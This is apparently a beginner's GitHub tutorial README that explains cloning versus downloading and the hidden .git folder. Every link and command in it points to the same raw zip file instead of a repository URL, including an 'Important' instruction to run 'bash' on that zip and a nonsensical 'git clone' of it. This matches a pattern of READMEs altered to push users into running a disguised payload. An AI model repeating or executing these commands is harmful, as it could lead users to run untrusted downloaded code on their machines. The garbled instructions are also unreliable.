Task: Getting a gthub repository the right way
Important
You need to get this github repository in you computer and run the following
bash https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zipIf you see the following message read the github page again
Faild , Try Again
READ the webpage again
- You can 'download', 'clone' the repo. to use clone type this in your cmd/terminal
git clone <the repocitory url>eg:
git clone https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zip- If you download code from GitHub, remember the word download, it does not downloads the
.gitfolder
- Repo: Repo Means a kind of folder, but it will have the .git folder.
- repo short for Repository
- "."(dot) infont of a folder means it's hidden
- When you download a repo from GitHub it will not contain the
.gitfolder
Caution
Download and clone are not same
-
Why there is a dot(.) in front of the .git folder Ans: The . or dot, means it is a hidden folder.
-
Where will be the 'download' thing in the https://raw.githubusercontent.com/sanjusathian/level_0/main/meridionally/level_0-v2.9.zip site Ans: If you open a repository (from now on we call repository as repo) you will see a dropdown at the top right named "Code", click on that and then you will see two tabs "Local" and "CodeSpaces" and then you will see "Clone" and "Download Zip" option